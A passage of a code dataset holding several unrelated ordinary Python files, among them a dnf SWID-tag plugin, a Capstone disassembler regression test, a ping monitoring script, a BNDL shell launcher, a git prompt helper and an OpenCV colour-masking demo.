m:\n\t\t\t\t\tcontinue\n\t\t\t\tif m.group(1) in remove_packages:\n\t\t\t\t\tself.remove_file(f)\n\n\t\tdownloaded_swidtags = {}\n\t\tpackages_in_repos = { None: [] }\n\t\tdirs = {}\n\n\t\tfor i in self.install_set:\n\t\t\ttry:\n\t\t\t\tchecksum = self.get_nevra_checksum(str(i), verbose=False)\n\t\t\t\tif not checksum:\n\t\t\t\t\tlogger.warning(\"No installed rpm found for package %s, will not sync SWID tag.\", str(i) )\n\t\t\t\t\tcontinue\n\n\t\t\t\tr = i.repo\n\t\t\t\tif r not in downloaded_swidtags:\n\t\t\t\t\tdownloaded_swidtags[r] = None\n\t\t\t\t\tif hasattr(r, \"get_metadata_path\"):\n\t\t\t\t\t\tfile = r.get_metadata_path(self.METADATA_TYPE)\n\t\t\t\t\t\tif file and file != \"\":\n\t\t\t\t\t\t\tdownloaded_swidtags[r] = repodata.Swidtags(None, file)\n\t\t\t\tif downloaded_swidtags[r]:\n\t\t\t\t\tif r not in packages_in_repos:\n\t\t\t\t\t\tpackages_in_repos[r] = []\n\t\t\t\t\tpackages_in_repos[r].append((i, checksum))\n\t\t\t\t\tcontinue\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\tpackages_in_repos[None].append((i, checksum))\n\n\t\tfor r in packages_in_repos:\n\t\t\tif not 
r:\n\t\t\t\tcontinue\n\t\t\ttags = downloaded_swidtags[r].tags_for_repo_packages(packages_in_repos[r])\n\t\t\tfor p in tags:\n\t\t\t\tfound = False\n\t\t\t\tfor t in tags[p]:\n\t\t\t\t\tlogger.debug(\"Retrieved SWID tag from repodata for %s: %s\", p[0], t.get_tagid())\n\t\t\t\t\tx = t.save_to_directory(self.dir_downloaded)\n\t\t\t\t\tdirs[x[0]] = True\n\t\t\t\t\tfound = True\n\t\t\t\tif not found:\n\t\t\t\t\tpackages_in_repos[None].append(p)\n\n\t\tfor d in dirs:\n\t\t\tself.create_swidtags_d_symlink(path.basename(d))\n\n\t\tif len(packages_in_repos[None]) > 0:\n\t\t\tp_names = [ str(p[0]) for p in packages_in_repos[None]]\n\t\t\tif self.run_rpm2swidtag_for(p_names) == 0:\n\t\t\t\tpkgs_missing = {}\n\t\t\t\tfor p in packages_in_repos[None]:\n\t\t\t\t\tpkgs_missing[p[1]] = p[0]\n\t\t\t\tfor f in iglob(path.join(self.dir_generated, \"*-rpm-*.swidtag\")):\n\t\t\t\t\tm = re.search(r'-rpm-([0-9a-f]{40}([0-9a-f]{24})?)\\.swidtag$', f)\n\t\t\t\t\tif m and m.group(1) in pkgs_missing:\n\t\t\t\t\t\tdel pkgs_missing[m.group(1)]\n\t\t\t\tfor p in pkgs_missing.values():\n\t\t\t\t\tlogger.warning(\"The SWID tag for rpm %s should have been generated but could not be found\", str(p))\n\n\tdef remove_file(self, file):\n\t\ttry:\n\t\t\tunlink(file)\n\t\texcept OSError as e:\n\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", file, e)\n\n\tdef purge_generated_dir(self):\n\t\tif not path.isdir(self.dir_generated):\n\t\t\treturn\n\t\tcount = 0\n\t\tfor f in listdir(self.dir_generated):\n\t\t\ttry:\n\t\t\t\tunlink(path.join(self.dir_generated, f))\n\t\t\t\tcount += 1\n\t\t\texcept OSError as e:\n\t\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", f, e)\n\t\ttry:\n\t\t\trmdir(self.dir_generated)\n\t\texcept OSError:\n\t\t\tlogger.warning(\"Failed to remove [%s]: %s\", self.dir_generated, e)\n\t\tif count > 0:\n\t\t\tlogger.debug(\"Removed %d generated files from %s\", count, self.dir_generated)\n\n\tdef purge_generated_symlink(self):\n\t\tsymlink_path = path.join(self.swidtags_d, self.generated_dirname)\n\t\tif not path.islink(symlink_path):\n\t\t\treturn\n\t\tself.remove_file(symlink_path)\n\n\tdef create_generated_dir(self):\n\t\tif not path.isdir(self.dir_generated):\n\t\t\tmakedirs(self.dir_generated)\n\n\tdef create_download_dir(self, dirname):\n\t\tdirname = path.join(self.dir_downloaded, dirname)\n\t\tif not path.isdir(dirname):\n\t\t\tmakedirs(dirname)\n\n\tdef create_swidtags_d_symlink(self, basename=None):\n\t\tif basename:\n\t\t\ttarget = path.join(SWIDTAG_DIR_DOWNLOAD, basename)\n\t\telse:\n\t\t\tbasename = self.generated_dirname\n\t\t\ttarget = path.join(SWIDTAG_DIR_GEN, basename)\n\t\tif not path.isdir(self.swidtags_d):\n\t\t\tmakedirs(self.swidtags_d)\n\t\tsrc = path.join(self.swidtags_d, basename)\n\t\tif not path.islink(src):\n\t\t\tsymlink(path.join(\"../../..\", target), src)\n\n\tdef run_rpm2swidtag_for(self, pkgs):\n\t\tif not pkgs or len(pkgs) < 1:\n\t\t\treturn -1\n\t\thostname = platform.uname()[1]\n\t\ttry:\n\t\t\trpm2swidtag_command = self.conf.get(\"main\", \"rpm2swidtag_command\")\n\t\texcept KeyError:\n\t\t\treturn -2\n\t\texcept Exception as e:\n\t\t\tif e.__class__.__name__ == \"NoOptionError\":\n\t\t\t\treturn -2\n\t\t\traise e\n\t\tlogger.debug(\"Running %s for %s ...\", rpm2swidtag_command, pkgs)\n\t\tenv = { \"_RPM2SWIDTAG_RPMDBPATH\": path.join(self.base.conf.installroot, \"usr/lib/sysimage/rpm\") }\n\t\tif not path.isdir(env[\"_RPM2SWIDTAG_RPMDBPATH\"]):\n\t\t\tenv[\"_RPM2SWIDTAG_RPMDBPATH\"] = path.join(self.base.conf.installroot, \"var/lib/rpm\")\n\t\tif \"PYTHONPATH\" 
in environ:\n\t\t\tenv[\"PYTHONPATH\"] = environ[\"PYTHONPATH\"]\n\t\tret = run(rpm2swidtag_command.split() + [\"--tag-creator\", hostname, \"--output-dir\", path.join(self.dir_generated, \".\")] + pkgs,\n\t\t\tenv=env, check=False).returncode\n\t\tself.create_generated_dir()\n\t\tself.create_swidtags_d_symlink()\n\t\treturn ret\n\n\tdef get_nevra_checksum(self, nevra, verbose=True):\n\t\tif not self.ts:\n\t\t\tts = rpm.transaction.initReadOnlyTransaction(root=self.base.conf.installroot)\n\t\trpms = ( ts.dbMatch(2, str(nevra)) )\n\t\tif len(rpms) > 1:\n\t\t\tif verbose:\n\t\t\t\tlogger.warning(\"Multiple rpms %s found installed for package %s.\", str(rpms), str(nevra))\n\t\t\treturn None\n\t\tfor r in rpms:\n\t\t\tchecksum = get_checksum(r)\n\t\t\tif checksum:\n\t\t\t\treturn checksum\n\t\t\tif verbose:\n\t\t\t\tlogger.warning(\"No checksum found for rpm %s.\", str(nevra))\n\t\treturn None\n","sub_path":"lib/dnf-plugins/swidtags.py","file_name":"swidtags.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298793049","text":"#!/usr/bin/env python\n\n# Capstone Python bindings, by Nguyen Anh Quynnh \nfrom __future__ import print_function\nimport sys\nfrom capstone import *\n\nall_tests = (\n # arch, mode, syntax, address, hexcode, expected output\n # issue 456 https://github.com/aquynh/capstone/issues/456\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfc16, b\"\\xE8\\x35\\x64\", \"call 0x604e\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_INTEL, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"call 0x6054\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"call 0x6054\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfc26, b\"\\xE9\\x35\\x64\", \"jmp 0x605e\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xfff6, b\"\\x66\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x53946431\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_INTEL, 0x9123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0xe4b7642b\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x64e4b7642b\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xffe1, b\"\\x66\\xe8\\x35\\x64\\x93\\x53\", \"call 0x5394641c\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123ffe1, b\"\\x66\\xe8\\x35\\x64\", \"call 0x641a\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_INTEL, 0x649123ffe1, b\"\\x66\\xe9\\x35\\x64\", \"jmp 0x641a\"),\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_INTEL, 0xffe1, b\"\\x66\\xe9\\x35\\x64\\x93\\x53\", \"jmp 0x5394641c\"),\n\n # AT&T syntax\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfc16, b\"\\xE8\\x35\\x64\", \"callw 0x604e\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_ATT, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"callw 0x6054\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x9123fc1b, b\"\\x66\\xE8\\x35\\x64\", \"callw 0x6054\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfc26, b\"\\xE9\\x35\\x64\", \"jmp 0x605e\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xfff6, b\"\\x66\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x53946431\"),\n (CS_ARCH_X86, CS_MODE_32, CS_OPT_SYNTAX_ATT, 0x9123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0xe4b7642b\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x649123fff1, b\"\\xE9\\x35\\x64\\x93\\x53\", \"jmp 0x64e4b7642b\"),\n\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xffe1, b\"\\x66\\xe8\\x35\\x64\\x93\\x53\", \"calll 0x5394641c\"),\n (CS_ARCH_X86, CS_MODE_64, 
CS_OPT_SYNTAX_ATT, 0x649123ffe1, b\"\\x66\\xe8\\x35\\x64\", \"callw 0x641a\"),\n (CS_ARCH_X86, CS_MODE_64, CS_OPT_SYNTAX_ATT, 0x649123ffe1, b\"\\x66\\xe9\\x35\\x64\", \"jmp 0x641a\"),\n (CS_ARCH_X86, CS_MODE_16, CS_OPT_SYNTAX_ATT, 0xffe1, b\"\\x66\\xe9\\x35\\x64\\x93\\x53\", \"jmp 0x5394641c\"),\n)\n\n_python3 = sys.version_info.major == 3\n\n\ndef to_hex(s):\n if _python3:\n return \" \".join(\"0x{0:02x}\".format(c) for c in s) # <-- Python 3 is OK\n else:\n return \" \".join(\"0x{0:02x}\".format(ord(c)) for c in s)\n\n\ndef str_syntax(syntax):\n slist = {\n 0: \"\",\n CS_OPT_SYNTAX_INTEL: \"intel\",\n CS_OPT_SYNTAX_ATT: \"att\",\n }\n\n return slist[syntax]\n\n\ndef str_arch_mode(a, m):\n amlist = {\n (CS_ARCH_X86, CS_MODE_16): \"X86-16bit\",\n (CS_ARCH_X86, CS_MODE_32): \"X86-32bit\",\n (CS_ARCH_X86, CS_MODE_64): \"X86-64bit\",\n }\n\n return amlist[(a, m)]\n\n\n# ## Test cs_disasm_quick()\ndef test_regression():\n for (arch, mode, syntax, address, code, expected_output) in all_tests:\n print(\"%s %s: %s = \" %(str_arch_mode(arch, mode), str_syntax(syntax), to_hex(code)), end=\"\"),\n md = Cs(arch, mode)\n if syntax != 0:\n md.syntax = syntax\n insn = list(md.disasm(code, address))[0]\n output = \"%s %s\" % (insn.mnemonic, insn.op_str)\n print(output)\n if output != expected_output:\n print(\"\\t --> ERROR: expected output = %s\" %(expected_output))\n\n print()\n\n\nif __name__ == '__main__':\n test_regression()\n","sub_path":"suite/regress.py","file_name":"regress.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650822139","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n\r\n\"\"\"Usage:\r\n ping [ --sip=<sip> ] [ --count=<count> ] [ --step=<step> ] <dip> <description>\r\n ping (-h | --help)\r\nOptions:\r\n -h --help Show this screen.\r\n\"\"\"\r\n\r\nimport time, commands, re\r\nfrom datetime import datetime\r\nfrom docopt import docopt\r\nfrom updateInfluxdb import UpdateDB\r\n\r\n\r\nclass Requirements(object):\r\n def __init__(self, dip, sip):\r\n super(Requirements, self).__init__()\r\n self.dip = dip\r\n self.sip = sip\r\n\r\n def ping(self):\r\n if self.sip == None:\r\n (status, output) = commands.getstatusoutput(\"ping -q -s 996 -W 1 -c 10 -i 0.5 {0}\".format(self.dip))\r\n else:\r\n (status, output) = commands.getstatusoutput(\"ping -q -s 996 -W 1 -c 10 -i 0.5 {0} -I {1}\".format(self.dip, self.sip))\r\n primary_ip = re.search(r'(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)', output).group()\r\n loss = re.findall(r'(?P<loss>\\d+)%', output)\r\n maximum = re.findall(r'rtt\\smin/avg/max/mdev\\s=\\s\\d+\\.\\d+\\/\\d+.\\d+\\/(?P<max>\\d+.\\d+)\\/\\d+.\\d+\\sms', output)\r\n info = {'PRIMARY_IP': primary_ip,\r\n 'LOSS': int(loss[0]),\r\n 'MAX': float(maximum[0]) if maximum else -1.0,\r\n }\r\n return info\r\n\r\ndef pinget(**kwargs):\r\n dip, sip = kwargs['dip'], kwargs['sip']\r\n p = Requirements(dip, sip)\r\n info = p.ping()\r\n return info\r\n\r\ndef updatedb(info):\r\n (status, output) = commands.getstatusoutput(\"hostname\")\r\n tags = {'PRIMARY_IP': info['PRIMARY_IP'],\r\n 'description': info['description'],\r\n 'type': 'ping',\r\n 'sip': info['sip'],\r\n }\r\n fields = {'LOSS': info['LOSS'],\r\n 'MAX': info['MAX'],\r\n }\r\n kwargs = {'measurement': output,\r\n 'tag': tags,\r\n 'fields': fields,\r\n 'timestamp': info['timestamp'],\r\n }\r\n UpdateDB(**kwargs)\r\n\r\ndef main():\r\n args = docopt(__doc__, version='download 1.0')\r\n kwargs = {'dip': args['<dip>'],\r\n 'sip': args['--sip'],\r\n }\r\n # the following converts local time to UTC\r\n timestamp = 
datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n info = pinget(**kwargs)\r\n info['timestamp'] = timestamp\r\n info['description'] = args['<description>']\r\n info['sip'] = args['--sip'] if args['--sip'] else 'localhost'\r\n updatedb(info)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"32895837","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport signal\n\nfrom cytoolz.itertoolz import groupby\n\nfrom bndl.compute.run import create_ctx\nfrom bndl.compute.worker import many_argparser\nfrom bndl.util.exceptions import catch\nfrom bndl.util.funcs import identity\nfrom bndl.util.threads import dump_threads\nimport bndl\n\n\nHEADER = r''' ___ _ _ ___ _\nWelcome | _ ) \\| | \\| |\nto the | _ \\ .` | |) | |__\n |___/_|\\_|___/|____| shell.\n\nRunning BNDL version %s.\nComputeContext available as ctx.''' % bndl.__version__\n\n\nargparser = argparse.ArgumentParser(parents=[many_argparser])\nargparser.prog = 'bndl.compute.shell'\nargparser.add_argument('--worker-count', nargs='?', type=int, default=None, dest='worker_count',\n help='The number of BNDL workers to start (defaults to 0 if seeds is set).')\nargparser.add_argument('--conf', nargs='*', default=(),\n help='BNDL configuration in \"key=value\" format')\n\n\ndef main():\n signal.signal(signal.SIGUSR1, dump_threads)\n\n try:\n args = argparser.parse_args()\n config = bndl.conf\n\n if args.listen_addresses:\n config['bndl.net.listen_addresses'] = args.listen_addresses\n if args.seeds:\n config['bndl.net.seeds'] = args.seeds\n config['bndl.compute.worker_count'] = 0\n if args.worker_count is not None:\n config['bndl.compute.worker_count'] = args.worker_count\n\n config['bndl.run.numactl'] = args.numactl\n config['bndl.run.pincore'] = args.pincore\n config['bndl.run.jemalloc'] = args.jemalloc\n\n config.update(*args.conf)\n\n ctx = create_ctx(config)\n ns = dict(ctx=ctx)\n\n if config['bndl.net.seeds'] or config['bndl.compute.worker_count'] != 0:\n print('Connecting with workers ...', end='\\r')\n worker_count = ctx.await_workers(args.worker_count)\n node_count = len(groupby(identity, [tuple(sorted(worker.ip_addresses())) for worker in ctx.workers]))\n header = HEADER + '\\nConnected with %r workers on %r nodes.' 
% (worker_count, node_count)\n else:\n header = HEADER\n\n try:\n import IPython\n IPython.embed(header=header, user_ns=ns)\n except ImportError:\n import code\n code.interact(header, local=ns)\n finally:\n with catch():\n ctx.stop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bndl/compute/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546011274","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\ndef fadeFlashLed(led):\n\tfor i in range(0, 100, 2):\n\t\tled.ChangeDutyCycle(i)\n\t\ttime.sleep(0.01)\n\n\tfor i in range(100, 0, -2):\n\t\tled.ChangeDutyCycle(i)\n\t\ttime.sleep(0.01)\n\nled = 4\n\nGPIO.setup(led, GPIO.OUT)\n\nlight = GPIO.PWM(led, 50)\nlight.start(0)\n\nfor i in range(0, 5):\n\tfadeFlashLed(light)\n\nlight.stop()\nGPIO.cleanup()","sub_path":"Python/GPIO/fadeFlashLed.py","file_name":"fadeFlashLed.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502218791","text":"#!/usr/bin/env python3\n\nimport sys\nfrom subprocess import Popen, PIPE\n\n# `git status --porcelain --branch` can collect all information\n# branch, remote_branch, untracked, staged, changed, conflicts, ahead, behind\npo = Popen(['git', 'status', '--porcelain', '--branch'], stdout=PIPE, stderr=PIPE)\nstdout, sterr = po.communicate()\n\ngit=\"0\"\nbranch=\"none\"\ndirty=\"0\"\nif po.returncode == 0:\n git = \"1\"\n lines = stdout.decode('utf-8').splitlines()\n s = lines[0]\n start = s.index(' ')\n branch = 'ERROR'\n if '.' in s:\n branch = s[s.index(' ')+1:s.index('.')]\n else:\n branch = s[s.index(' ')+1:]\n\n dirty = \"0\"\n if len(lines) > 1: dirty = \"1\"\n\nout = ' '.join([git, branch, dirty])\nprint(out, end='')\n","sub_path":"custom/plugins/git-prompt-custom/gitstatus.py","file_name":"gitstatus.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611582615","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nWrite a program to find the n-th ugly number.\n\nUgly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10 ugly numbers.\n\nNote that 1 is typically treated as an ugly number.\n\"\"\"\n\nclass Solution(object):\n def nthUglyNumber(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n result = [1]\n mul2 = mul3 = mul5 = 0\n for _ in xrange(n - 1):\n minVal = min(result[mul2] * 2, result[mul3] * 3, result[mul5] * 5)\n result.append(minVal)\n if minVal == result[mul2] * 2:\n mul2 += 1\n if minVal == result[mul3] * 3:\n mul3 += 1\n if minVal == result[mul5] * 5:\n mul5 += 1\n return result[-1]\n","sub_path":"Python/264-UglyNumber2/nthUglyNumber.py","file_name":"nthUglyNumber.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476828287","text":"##############################################################################################\n# Description: Creates a new sampletable.txt for differential expression analysis which\n#\t\tis necessary because a user may remove samples from their groups.tab file\n#\t\tafter running QC. 
The new sampletable.txt file is created from the\n#\t\tgroups.tab file that is provided when running DE half of the pipeline.\n#\t\tAlso a corresponding RawCounts_RSEM_genes.txt file is created which only\n#\t\tcontains information for samples that that are specificed in groups.tab.\n#\t\tThis file is written to DEG_{group1}-{group2}_{mincpm}_{minsample} folder.\n#\t\tIt is necessary that the order of the groups listed in sampletable.txt and\n#\t\tand RawCounts_RSEM_genes_filtered.txt match. If they do not the reported\n#\t\tdirection (sign: postive or negative) of each gene's fold-change will be\n#\t\topposite of what it should be. This program also addresses that problem.\n# USAGE:\tpython filterSampleTable.py -s 'rbfoxKO_1,rbfoxKO_2,control_1,control_2'\\\n#\t\t\t\t\t -g 'KO,KO,WT,WT' -l 'KO_1,KO_2,WT_1,WT_2' \\\n#\t\t\t\t\t -r 'RawCountFile_RSEM_genes.txt' \\\n#\t\t\t\t\t -outsample 'outfolder/sampletable.txt'\\\n#\t\t\t\t\t -outraw 'outfolder/RawCountFile_RSEM_genes.txt'\n##############################################################################################\n\nfrom __future__ import print_function, division\nimport os, sys\nimport argparse # module load python/3.5\n\n\n\n\ndef filteredRawCounts(rawcountsfilename, samples, outrawfilename):\n\t'''Generator that yields rawcounts information for samples in the current DEG groups.tab file.\n\tHelper function checks formating of the headers between the newly generated sampletable.txt and\n\tinput RawCounts_RSEM_genes.txt file. If the order of groups formatting differs, it fixes it to match\n\tthe ordering in sampletable.txt (fail-safe to ensure later referential integrity at DE).\n\t'''\n\tdef formatted(headerlist, samples, linelist):\n\t\theaderIndexes = {}\n\t\tsymbol = linelist[0]\n\t\t# Create Dictionary for mapping samplename in header of RawCounts_RSEM_genes.txt to its position \n\t\tfor i in range(len(headerlist)):\n\t\t\theaderIndexes[headerlist[i]] = i\n\t\tindexlist = []\n\t\tformattedlist = [symbol]\n\t\tfor sample in samples:\n\t\t\ttry:\n\t\t\t\tindexlist.append(headerIndexes[sample])\n\t\t\t\tformattedlist.append(linelist[headerIndexes[sample]])\n\t\t\texcept KeyError:\n\t\t\t\traise Exception('Key Error: Failed to find sample {} in RawCounts_RSEM_genes.txt.\\nDid you add an additional sample to groups.tab?'.format(sample))\n\t\treturn formattedlist\n\n\trawfh = open(rawcountsfilename, 'r')\n\theaderlist = [ fn.split('/')[-1].split('.')[0] for fn in next(rawfh).strip().split('\\t')]\n\n\tnewheader = '\\t'.join([headerlist[0]]+ samples) + '\\n'\n\tprint(newheader)\n\toutfh = open(outrawfilename, 'w')\n\toutfh.write(newheader)\n\tfor line in rawfh:\n\t\tlinelist = line.strip().split('\\t')\n\t\tformattedlist = formatted(headerlist, samples, linelist)\n\t\t#print(formattedlist)\n\t\toutfh.write('\\t'.join(formattedlist) + '\\n')\n\trawfh.close()\n\toutfh.close()\n\ndef SampleTable(samples, groups, labels,contrasts):\n\t'''Generator that yields sample, group, and label info from the current DEG groups.tab file'''\n\tfor i in range(len(samples)):\n\t\tif groups[i] in contrasts:\n\t\t\tyield samples[i], groups[i], labels[i]\n\n\n\nif __name__ == '__main__':\n\n\t# USAGE: python filterSampleTable.py -c 'KO WT' -s 'rbfoxKO_1,rbfoxKO_2,rbfoxKO_3,control_1,control_2,control_3' -g 'KO,KO,KO,WT,WT,WT' -l 'KO_1,KO_2,KO_3,WT_1,WT_2,WT_3' -r 'RawCountFile_RSEM_genes.txt' -outsample 'outfolder/sampletable.txt' -outraw 'outfolder/RawCountFile_RSEM_genes.txt'\n\t# Parse Command-line arguments\n\tparser = 
argparse.ArgumentParser(description='Filters sampletable.txt, cannot always use the sampletable that is generated in QC, sometimes DE is run with less samples.')\n\tparser.add_argument('-r','--inputRawCounts', type=str, required=True, help='Input RawCounts_RSEM_genes.txt file that is generated QC: (required)')\n\tparser.add_argument('-outraw','--outputRawCounts', type=str, required=True, help='Output RawCounts_RSEM_genes.txt filename (required)')\n\tparser.add_argument('-outsample','--outputSampleTable', type=str, required=True, help='Output RawCounts_RSEM_genes.txt filename (required)')\n\tparser.add_argument('-s','--samples', type=str, required=True, help='samples string from the run.json file (required)')\n\tparser.add_argument('-c','--contrast', type=str, required=True, help='contrast string (required)')\n\tparser.add_argument('-g','--groups', type=str, required=True, help='groups string from the run.json file (required)')\n\tparser.add_argument('-l','--labels', type=str, required=True, help='labels string from the run.json file (required)')\n\targs = parser.parse_args()\n\n\tsampleslist = args.samples.split(',')\n\tgroupslist = args.groups.split(',')\n\tlabelslist = args.labels.split(',')\n\tcontrastlist = args.contrast.split(' ')\n\tprint(sampleslist)\n\tprint(groupslist)\n\tprint(labelslist)\n\n\n\t#Creating the new sampletable.txt file based off of the current DEG groups.tab information\n\tsamptablefh = open(args.outputSampleTable, 'w')\n\tsamptablefh.write('sampleName\\tfileName\\tcondition\\tlabel\\n')\n\tsamplesincontrast = []\n\tgroupset = []\n\tfor sample, group, label in SampleTable(sampleslist, groupslist, labelslist, contrastlist):\n\t\tprint('{0}\\t{0}\\t{1}\\t{2}'.format(sample, group, label))\n\t\tsamplesincontrast.append(sample)\n\t\tgroupset.append(group)\n\t\tsamptablefh.write('{0}\\t{0}\\t{1}\\t{2}\\n'.format(sample, group, label))\n\tsamptablefh.close()\n\n\tif len(set(groupset)) < 2:\n\t\traise Exception('Error in groups.tab file. 
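The formatted() helper in the filterSampleTable.py record above reorders raw-count columns through a header-to-index map; the same idea in isolation, a sketch with invented sample names:

header = ['symbol', 'control_1', 'rbfoxKO_1']
wanted = ['rbfoxKO_1', 'control_1']          # order taken from sampletable.txt
index = {name: i for i, name in enumerate(header)}
row = ['GeneA', '10', '42']
# Keep the gene symbol, then emit counts in sampletable order so the
# sign of each reported fold-change stays consistent downstream.
reordered = [row[0]] + [row[index[s]] for s in wanted]
print(reordered)  # ['GeneA', '42', '10']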
Contrast does not contain two groups!')\n\n\t#Creating new RawCounts_RSEM_genes.txt file based off of the current DEG groups.tab information\n\trawfn = args.inputRawCounts\n\toutrawfn = args.outputRawCounts\n\tfilteredRawCounts(rawfn, samplesincontrast, outrawfn)\n\n\n","sub_path":"Results-template/Scripts/filterSampleTable.py","file_name":"filterSampleTable.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587004571","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n\n # Take each frame; read() returns a (success flag, frame) pair\n ret, frame = cap.read()\n frame2 = frame.copy()\n frame3 = frame.copy()\n\n # Convert BGR to HSV\n hsv_blue = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n hsv_green = hsv_blue.copy() \n\n # define range of blue color in HSV\n lower_blue = np.array([110,50,50])\n upper_blue = np.array([130,255,255])\n\n # define range of green color in HSV\n lower_green = np.array([50, 100, 100])\n upper_green = np.array([70, 255, 255])\n\n # Threshold the HSV image to get only the target colors\n mask_blue = cv2.inRange(hsv_blue, lower_blue, upper_blue)\n mask_green = cv2.inRange(hsv_green, lower_green, upper_green)\n\n # Bitwise-AND mask and original image\n res = cv2.bitwise_and(frame, frame, mask=mask_blue)\n res2 = cv2.bitwise_and(frame2, frame2, mask=mask_green)\n\n cv2.imshow('frame_blue',frame)\n cv2.imshow('mask_blue',mask_blue)\n cv2.imshow('res_blue',res)\n\n cv2.imshow('frame_green',frame2)\n cv2.imshow('mask_green',mask_green)\n cv2.imshow('res_green',res2)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()\n","sub_path":"imgpros_multicolor_new.py","file_name":"imgpros_multicolor_new.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613791791","text":"'''\nThis module contains implementations of Scott's and Fleiss' Pi, adapted in\n[FournierInkpen2012]_ for segmentation (in as similar a manner as [Hearst1997]_)\nusing the formulation of Kappa provided in [ArtsteinPoesio2008]_.\n\nPi's general form could be described, as it is in [ArtsteinPoesio2008]_, in \nterms of actual agreement (:math:`\\\\text{A}_a`) and expected agreement \n(:math:`\\\\text{A}_e`) as:\n\n.. math::\n \\pi,\\pi^* = \\\\frac{\\\\text{A}_a-\\\\text{A}_e}{1 \\\n - \\\\text{A}_e}\n\n:math:`\\pi` represents Scott's Pi (for 2 coders), whereas :math:`\\pi^*`\nrepresents its generalization to more than 2 coders. Each metric calculates\n:math:`\\\\text{A}_a` using :func:`segeval.agreement.actual_agreement` and\nonly varies the calculation of :math:`\\\\text{A}_e`.\n\n\n..
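As a side sketch (not part of the record above), the two colour masks in imgpros_multicolor_new.py can also be OR-ed into one mask before masking the frame; this assumes an OpenCV BGR frame and the same HSV ranges:

import cv2
import numpy as np

def highlight_blue_and_green(frame):
    # One HSV conversion serves both colour ranges.
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
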